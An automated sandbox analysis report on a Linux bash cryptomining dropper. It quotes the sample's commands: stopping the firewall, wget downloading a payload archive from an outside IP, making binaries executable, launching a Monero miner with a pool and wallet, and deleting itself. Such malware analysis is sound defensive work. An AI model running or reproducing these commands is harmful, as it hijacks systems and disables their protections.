Analysis Report L1fyFAYhE5

Overview

General Information

Joe Sandbox Version:24.0.0
Analysis ID:678655
Start date:03.10.2018
Start time:10:48:00
Joe Sandbox Product:Cloud
Overall analysis duration:0h 4m 59s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:L1fyFAYhE5
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Detection:MAL
Classification:mal60.troj.evad.mine.lin@0/0@0/0

Detection

Strategy | Score | Range | Reporting | Detection
Threshold | 60 | 0 - 100 | Report FP / FN | malicious

Classification

Signature Overview

Bitcoin Miner:

Found strings related to Crypto-Mining
Source: L1fyFAYhE5 | String found in binary or memory: ./minerm -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8YJ5oXWLWwik4V8Ji7Z -p x
Source: L1fyFAYhE5 | String found in binary or memory: ./999 -a cryptonight -o xmr -u 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8YJ5oXWLWwik4V8Ji7Z -p x -B
Source: L1fyFAYhE5 | String found in binary or memory: ./minerm -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8YJ5oXWLWwik4V8Ji7Z -p x

Networking:

Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.1.100:44274 -> 115.236.92.99:54321
Tries to stop the "iptables" service
Source: /usr/sbin/service (PID: 17728) | Systemctl executable stopping iptables: /sbin/systemctl -> systemctl stop iptables.service
Source: /usr/sbin/service (PID: 17728) | Systemctl executable stopping iptables: /bin/systemctl -> systemctl stop iptables.service
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 115.236.92.99
Source: unknown | TCP traffic detected without corresponding DNS query: 115.236.92.99
Source: unknown | TCP traffic detected without corresponding DNS query: 115.236.92.99
Source: unknown | TCP traffic detected without corresponding DNS query: 115.236.92.99
Source: unknown | TCP traffic detected without corresponding DNS query: 115.236.92.99
Source: unknown | TCP traffic detected without corresponding DNS query: 115.236.92.99
Source: unknown | TCP traffic detected without corresponding DNS query: 115.236.92.99
Executes the "wget" command typically used for HTTP/S downloading
Source: /bin/bash (PID: 18102) | Wget executable: /usr/bin/wget -> wget http://115.236.92.99:54321/mall.tar.gz
Urls found in memory or binary data
Source: L1fyFAYhE5 | String found in binary or memory: http://115.236.92.99:54321/mall.tar.gz

System Summary:

Sample contains strings that are potentially command strings
Source: Initial sample | Potential command found: service iptables stop
Source: Initial sample | Potential command found: rm -f /tmp/httpdlog/*.gz
Source: Initial sample | Potential command found: rm -f *.gz
Source: Initial sample | Potential command found: rm -f *.sh
Source: Initial sample | Potential command found: rm -f $0
Source: Initial sample | Potential command found: killall -9 daemon.armv4l.mod
Source: Initial sample | Potential command found: killall -9 daemon.i686.mod
Source: Initial sample | Potential command found: killall -9 daemon.mips.mod
Source: Initial sample | Potential command found: killall -9 daemon.mipsel.mod
Source: Initial sample | Potential command found: killall -9 test.mod
Source: Initial sample | Potential command found: killall -9 btminerd
Source: Initial sample | Potential command found: killall -9 os64
Source: Initial sample | Potential command found: killall -9 os32
Source: Initial sample | Potential command found: killall -9 xptminer2
Source: Initial sample | Potential command found: killall -9 xptminer
Source: Initial sample | Potential command found: killall -9 minerd
Source: Initial sample | Potential command found: killall -9 mstrie
Source: Initial sample | Potential command found: killall -9 mstxcn
Source: Initial sample | Potential command found: killall -9 mstbit
Source: Initial sample | Potential command found: killall -9 mstbtc
Source: Initial sample | Potential command found: killall -9 ethermine
Source: Initial sample | Potential command found: killall -9 zcash
Source: Initial sample | Potential command found: killall -9 xxj
Source: Initial sample | Potential command found: killall -9 yam
Source: Initial sample | Potential command found: killall -9 metacity
Source: Initial sample | Potential command found: killall -9 nautilus
Source: Initial sample | Potential command found: rm -f /tmp/.httpdlog*.gz
Source: Initial sample | Potential command found: echo "yes"
Source: Initial sample | Potential command found: mkdir /tmp/.httpdlog
Source: Initial sample | Potential command found: cd /tmp/.httpdlog
Source: Initial sample | Potential command found: wget http://115.236.92.99:54321/mall.tar.gz
Source: Initial sample | Potential command found: tar zxvf mall.tar.gz
Source: Initial sample | Potential command found: chmod 777 m7xmr
Source: Initial sample | Potential command found: chmod 777 minerm
Source: Initial sample | Potential command found: chmod 777 mstxmr
Source: Initial sample | Potential command found: chmod 777 ./m7xmr
Source: Initial sample | Potential command found: chmod 777 ./minerm
Source: Initial sample | Potential command found: chmod 777 ./mstxmr
Source: Initial sample | Potential command found: chmod 777 999
Source: Initial sample | Potential command found: chmod 777 ALib
Source: Initial sample | Potential command found: chmod 777 ./999
Source: Initial sample | Potential command found: chmod 777 ./ALib
Source: Initial sample | Potential command found: echo "ok"
Classification label
Source: classification engine | Classification label: mal60.troj.evad.mine.lin@0/0@0/0

Persistence and Installation Behavior:

Executes the "rm" command used to delete files or directories
Source: /bin/bash (PID: 18010) | Rm executable: /bin/rm -> rm -f /tmp/httpdlog/*.gz
Source: /bin/bash (PID: 18015) | Rm executable: /bin/rm -> rm -f *.gz
Source: /bin/bash (PID: 18020) | Rm executable: /bin/rm -> rm -f *.sh
Source: /bin/bash (PID: 18032) | Rm executable: /bin/rm -> rm -f /tmp/L1fyFAYhE5
Tries to stop the "iptables" service
Source: /usr/sbin/service (PID: 17728) | Systemctl executable stopping iptables: /sbin/systemctl -> systemctl stop iptables.service
Source: /usr/sbin/service (PID: 17728) | Systemctl executable stopping iptables: /bin/systemctl -> systemctl stop iptables.service
Creates hidden files and/or directories
Source: /bin/mkdir (PID: 18101) | Directory: /tmp/.httpdlog
Enumerates processes within the "proc" file system
Source: /bin/ps (PID: 18040) | File opened: /proc/17200/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/17200/status
Source: /bin/ps (PID: 18040) | File opened: /proc/17200/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/17321/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/17321/status
Source: /bin/ps (PID: 18040) | File opened: /proc/17321/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/17289/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/17289/status
Source: /bin/ps (PID: 18040) | File opened: /proc/17289/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/17284/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/17284/status
Source: /bin/ps (PID: 18040) | File opened: /proc/17284/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/2396/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/2396/status
Source: /bin/ps (PID: 18040) | File opened: /proc/2396/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/17160/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/17160/status
Source: /bin/ps (PID: 18040) | File opened: /proc/17160/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/17161/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/17161/status
Source: /bin/ps (PID: 18040) | File opened: /proc/17161/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/1180/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/1180/status
Source: /bin/ps (PID: 18040) | File opened: /proc/1180/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/17208/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/17208/status
Source: /bin/ps (PID: 18040) | File opened: /proc/17208/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/17329/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/17329/status
Source: /bin/ps (PID: 18040) | File opened: /proc/17329/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/16875/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/16875/status
Source: /bin/ps (PID: 18040) | File opened: /proc/16875/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/17204/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/17204/status
Source: /bin/ps (PID: 18040) | File opened: /proc/17204/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/2308/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/2308/status
Source: /bin/ps (PID: 18040) | File opened: /proc/2308/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/17206/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/17206/status
Source: /bin/ps (PID: 18040) | File opened: /proc/17206/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/10/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/10/status
Source: /bin/ps (PID: 18040) | File opened: /proc/10/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/11/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/11/status
Source: /bin/ps (PID: 18040) | File opened: /proc/11/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/17211/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/17211/status
Source: /bin/ps (PID: 18040) | File opened: /proc/17211/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/12/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/12/status
Source: /bin/ps (PID: 18040) | File opened: /proc/12/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/17179/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/17179/status
Source: /bin/ps (PID: 18040) | File opened: /proc/17179/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/13/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/13/status
Source: /bin/ps (PID: 18040) | File opened: /proc/13/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/17334/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/17334/status
Source: /bin/ps (PID: 18040) | File opened: /proc/17334/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/14/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/14/status
Source: /bin/ps (PID: 18040) | File opened: /proc/14/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/9475/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/9475/status
Source: /bin/ps (PID: 18040) | File opened: /proc/9475/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/17214/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/17214/status
Source: /bin/ps (PID: 18040) | File opened: /proc/17214/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/15/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/15/status
Source: /bin/ps (PID: 18040) | File opened: /proc/15/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/16/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/16/status
Source: /bin/ps (PID: 18040) | File opened: /proc/16/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/17/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/17/status
Source: /bin/ps (PID: 18040) | File opened: /proc/17/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/18/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/18/status
Source: /bin/ps (PID: 18040) | File opened: /proc/18/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/17210/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/17210/status
Source: /bin/ps (PID: 18040) | File opened: /proc/17210/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/19/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/19/status
Source: /bin/ps (PID: 18040) | File opened: /proc/19/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/17170/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/17170/status
Source: /bin/ps (PID: 18040) | File opened: /proc/17170/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/1194/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/1194/status
Source: /bin/ps (PID: 18040) | File opened: /proc/1194/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/1/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/1/status
Source: /bin/ps (PID: 18040) | File opened: /proc/1/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/2/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/2/status
Source: /bin/ps (PID: 18040) | File opened: /proc/2/cmdline
Source: /bin/ps (PID: 18040) | File opened: /proc/2315/stat
Source: /bin/ps (PID: 18040) | File opened: /proc/2315/status
Source: /bin/ps (PID: 18040) | File opened: /proc/2315/cmdline
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/bash (PID: 18041) | Grep executable: /bin/grep -> grep 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8YJ5oXWLWwik4V8Ji7Z
Source: /bin/bash (PID: 18042) | Grep executable: /bin/grep -> grep -v grep
Executes the "mkdir" command used to create folders
Source: /bin/bash (PID: 18101) | Mkdir executable: /bin/mkdir -> mkdir /tmp/.httpdlog
Executes the "ps" command used to list the status of processes
Source: /bin/bash (PID: 18040) | Ps executable: /bin/ps -> ps -ef
Executes the "systemctl" command used for controlling the systemd system and service manager
Source: /usr/sbin/service (PID: 17728) | Systemctl executable: /bin/systemctl -> systemctl stop iptables.service
Source: /usr/sbin/service (PID: 17731) | Systemctl executable: /bin/systemctl -> systemctl --quiet is-active multi-user.target
Source: /usr/sbin/service (PID: 17733) | Systemctl executable: /bin/systemctl -> systemctl list-unit-files --full --type=socket
Source: /usr/sbin/service (PID: 17791) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show acpid.socket
Source: /usr/sbin/service (PID: 17792) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show apport-forward.socket
Source: /usr/sbin/service (PID: 17796) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show avahi-daemon.socket
Source: /usr/sbin/service (PID: 17803) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show cups.socket
Source: /usr/sbin/service (PID: 17823) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dbus.socket
Source: /usr/sbin/service (PID: 17834) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dm-event.socket
Source: /usr/sbin/service (PID: 17838) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmetad.socket
Source: /usr/sbin/service (PID: 17847) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmpolld.socket
Source: /usr/sbin/service (PID: 17858) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lxd.socket
Source: /usr/sbin/service (PID: 17865) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show saned.socket
Source: /usr/sbin/service (PID: 17874) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show snapd.socket
Source: /usr/sbin/service (PID: 17883) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show ssh.socket
Source: /usr/sbin/service (PID: 17895) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show syslog.socket
Source: /usr/sbin/service (PID: 17903) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-bus-proxyd.socket
Source: /usr/sbin/service (PID: 17910) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-fsckd.socket
Source: /usr/sbin/service (PID: 17921) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-initctl.socket
Source: /usr/sbin/service (PID: 17932) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-audit.socket
Source: /usr/sbin/service (PID: 17941) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-dev-log.socket
Source: /usr/sbin/service (PID: 17950) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald.socket
Source: /usr/sbin/service (PID: 17954) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-networkd.socket
Source: /usr/sbin/service (PID: 17961) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-rfkill.socket
Source: /usr/sbin/service (PID: 17972) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-control.socket
Source: /usr/sbin/service (PID: 17987) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-kernel.socket
Source: /usr/sbin/service (PID: 17993) | Systemctl executable: /bin/systemctl -> systemctl -p Triggers show uuidd.socket
Executes the "wget" command typically used for HTTP/S downloading
Source: /bin/bash (PID: 18102) | Wget executable: /usr/bin/wget -> wget http://115.236.92.99:54321/mall.tar.gz
Reads system information from the proc file system
Source: /bin/ps (PID: 18040) | Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 18040) | Reads from proc file: /proc/stat

Hooking and other Techniques for Hiding and Protection:

Sample deletes itself
Source: /bin/rm (PID: 18032) | File: /tmp/L1fyFAYhE5


Runtime Messages

Command:bash "/tmp/L1fyFAYhE5"
Exit Code:
Exit Code Info:
Killed:True
Standard Output:
Standard Error:/tmp/L1fyFAYhE5: line 1: #!/bin/bash: No such file or directory
/tmp/L1fyFAYhE5: line 2: /etc/init.d/iptables: No such file or directory
Failed to stop iptables.service: Unit iptables.service not loaded.
/tmp/L1fyFAYhE5: line 4: SuSEfirewall2: command not found
/tmp/L1fyFAYhE5: line 5: reSuSEfirewall2: command not found
--2018-10-03 12:49:11-- http://115.236.92.99:54321/mall.tar.gz

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
Behavior Graph ID: 678655 | Sample: L1fyFAYhE5 | Start date: 03/10/2018 | Architecture: LINUX | Score: 60

The graph image itself is not reproduced here; the nodes and edges it recorded are:

  • Network node: 115.236.92.99, port 54321 (CHINANET-BACKBONENo31Jin-rongStreetCN, China), tagged "Detected TCP or UDP traffic on non-standard ports"
  • Sample node tagged "Found strings related to Crypto-Mining"; it started bash
  • bash started: service -> systemctl (tagged "Tries to stop the "iptables" service"), rm (tagged "Sample deletes itself" and "Executes the "rm" command used to delete files or directories"), a second rm, and 9 other processes
  • service started: two basename processes, systemctl, sed, and 25 other processes
  • one of the other bash processes started: ps, grep, grep

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Startup

  • system is lnxubuntu1
  • bash (PID: 17713, Parent: 17667, MD5: 5e666695cf08d1638bb85684e30185ee)
    • bash New Fork (PID: 17726, Parent: 17713)
    • bash New Fork (PID: 17727, Parent: 17713)
    • bash New Fork (PID: 17728, Parent: 17713)
    • service (PID: 17728, Parent: 17713, MD5: 81c4fe604ec67916db7b223725e5a9c6)
      • service New Fork (PID: 17729, Parent: 17728)
      • basename (PID: 17729, Parent: 17728, MD5: fd7bba8b11b99ec7559f30226c79a729)
      • service New Fork (PID: 17730, Parent: 17728)
      • basename (PID: 17730, Parent: 17728, MD5: fd7bba8b11b99ec7559f30226c79a729)
      • service New Fork (PID: 17731, Parent: 17728)
      • systemctl (PID: 17731, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17732, Parent: 17728)
        • service New Fork (PID: 17733, Parent: 17732)
        • systemctl (PID: 17733, Parent: 17732, MD5: b08096235b8c90203e17721264b5ce40)
        • service New Fork (PID: 17734, Parent: 17732)
        • sed (PID: 17734, Parent: 17732, MD5: c1a00c583ba08e728b10f3f46f5776d6)
      • service New Fork (PID: 17791, Parent: 17728)
      • systemctl (PID: 17791, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17792, Parent: 17728)
      • systemctl (PID: 17792, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17796, Parent: 17728)
      • systemctl (PID: 17796, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17803, Parent: 17728)
      • systemctl (PID: 17803, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17823, Parent: 17728)
      • systemctl (PID: 17823, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17834, Parent: 17728)
      • systemctl (PID: 17834, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17838, Parent: 17728)
      • systemctl (PID: 17838, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17847, Parent: 17728)
      • systemctl (PID: 17847, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17858, Parent: 17728)
      • systemctl (PID: 17858, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17865, Parent: 17728)
      • systemctl (PID: 17865, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17874, Parent: 17728)
      • systemctl (PID: 17874, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17883, Parent: 17728)
      • systemctl (PID: 17883, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17895, Parent: 17728)
      • systemctl (PID: 17895, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17903, Parent: 17728)
      • systemctl (PID: 17903, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17910, Parent: 17728)
      • systemctl (PID: 17910, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17921, Parent: 17728)
      • systemctl (PID: 17921, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17932, Parent: 17728)
      • systemctl (PID: 17932, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17941, Parent: 17728)
      • systemctl (PID: 17941, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17950, Parent: 17728)
      • systemctl (PID: 17950, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17954, Parent: 17728)
      • systemctl (PID: 17954, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17961, Parent: 17728)
      • systemctl (PID: 17961, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17972, Parent: 17728)
      • systemctl (PID: 17972, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17987, Parent: 17728)
      • systemctl (PID: 17987, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17993, Parent: 17728)
      • systemctl (PID: 17993, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
    • systemctl (PID: 17728, Parent: 17713, MD5: b08096235b8c90203e17721264b5ce40)
    • bash New Fork (PID: 18003, Parent: 17713)
    • bash New Fork (PID: 18007, Parent: 17713)
    • bash New Fork (PID: 18010, Parent: 17713)
    • rm (PID: 18010, Parent: 17713, MD5: b79876063d894c449856cca508ecca7f)
    • bash New Fork (PID: 18015, Parent: 17713)
    • rm (PID: 18015, Parent: 17713, MD5: b79876063d894c449856cca508ecca7f)
    • bash New Fork (PID: 18020, Parent: 17713)
    • rm (PID: 18020, Parent: 17713, MD5: b79876063d894c449856cca508ecca7f)
    • bash New Fork (PID: 18032, Parent: 17713)
    • rm (PID: 18032, Parent: 17713, MD5: b79876063d894c449856cca508ecca7f)
    • bash New Fork (PID: 18034, Parent: 17713)
      • bash New Fork (PID: 18040, Parent: 18034)
      • ps (PID: 18040, Parent: 18034, MD5: 37339e5441057d422e61e8a471505337)
      • bash New Fork (PID: 18041, Parent: 18034)
      • grep (PID: 18041, Parent: 18034, MD5: fc9b0a0ff848b35b3716768695bf2427)
      • bash New Fork (PID: 18042, Parent: 18034)
      • grep (PID: 18042, Parent: 18034, MD5: fc9b0a0ff848b35b3716768695bf2427)
    • bash New Fork (PID: 18101, Parent: 17713)
    • mkdir (PID: 18101, Parent: 17713, MD5: a97f666f21c85ec62ea47d022263ef41)
    • bash New Fork (PID: 18102, Parent: 17713)
    • wget (PID: 18102, Parent: 17713, MD5: 458ce58ac4b1aac3eafc287fa46bf92d)
  • cleanup

Created / dropped Files

No created / dropped files found

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://115.236.92.99:54321/mall.tar.gz | L1fyFAYhE5 | false |  | unknown

Contacted IPs

(The per-country map shown here in the original report, with its legend of IP-count buckets at 25%, 50% and 75%, is not reproduced.)

Public

IP | Country | ASN | ASN Name | Malicious
115.236.92.99 | China | 4134 | CHINANET-BACKBONENo31Jin-rongStreetCN | true

Static File Info

General

File type:UTF-8 Unicode (with BOM) text
Entropy (8bit):5.528162830997711
TrID:
  • Text - UTF-8 encoded (3003/1) 100.00%
File name:L1fyFAYhE5
File size:2014
MD5:94bfedc1dd3a8e3760fca3229a573464
SHA1:483573dbbd40e0af67e18b67105cbd4af7d2e5f9
SHA256:e094df700e7c3523fffcaafe55b26ec52dc0c123a5e2e0779904b42f9d8d0739
SHA512:70a6621079189ed11a61495aeeb84f63ad29f39689f312334efad7174b44e815fd232cb599e369bbd5f2050a47000f337a1f9236d45ed6a63139d6db9d713c4c
File Content Preview:...#!/bin/bash./etc/init.d/iptables stop.service iptables stop.SuSEfirewall2 stop.reSuSEfirewall2 stop.rm -f /tmp/httpdlog/*.gz.rm -f *.gz.rm -f *.sh.rm -f $0.ret=`ps -ef|grep 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8Y

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2018 10:49:13.030000925 CEST | 44274 | 54321 | 192.168.1.100 | 115.236.92.99
Oct 3, 2018 10:49:14.026628017 CEST | 44274 | 54321 | 192.168.1.100 | 115.236.92.99
Oct 3, 2018 10:49:16.030488968 CEST | 44274 | 54321 | 192.168.1.100 | 115.236.92.99
Oct 3, 2018 10:49:20.038564920 CEST | 44274 | 54321 | 192.168.1.100 | 115.236.92.99
Oct 3, 2018 10:49:28.054533958 CEST | 44274 | 54321 | 192.168.1.100 | 115.236.92.99
Oct 3, 2018 10:49:44.070491076 CEST | 44274 | 54321 | 192.168.1.100 | 115.236.92.99
Oct 3, 2018 10:50:16.134579897 CEST | 44274 | 54321 | 192.168.1.100 | 115.236.92.99
Oct 3, 2018 10:52:23.213716030 CEST | 60815 | 53 | 192.168.1.100 | 8.8.8.8
Oct 3, 2018 10:52:23.214348078 CEST | 39029 | 53 | 192.168.1.100 | 8.8.8.8
Oct 3, 2018 10:52:23.226145029 CEST | 53 | 60815 | 8.8.8.8 | 192.168.1.100
Oct 3, 2018 10:52:23.226608992 CEST | 53 | 39029 | 8.8.8.8 | 192.168.1.100

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2018 10:52:23.213716030 CEST | 60815 | 53 | 192.168.1.100 | 8.8.8.8
Oct 3, 2018 10:52:23.214348078 CEST | 39029 | 53 | 192.168.1.100 | 8.8.8.8
Oct 3, 2018 10:52:23.226145029 CEST | 53 | 60815 | 8.8.8.8 | 192.168.1.100
Oct 3, 2018 10:52:23.226608992 CEST | 53 | 39029 | 8.8.8.8 | 192.168.1.100

System Behavior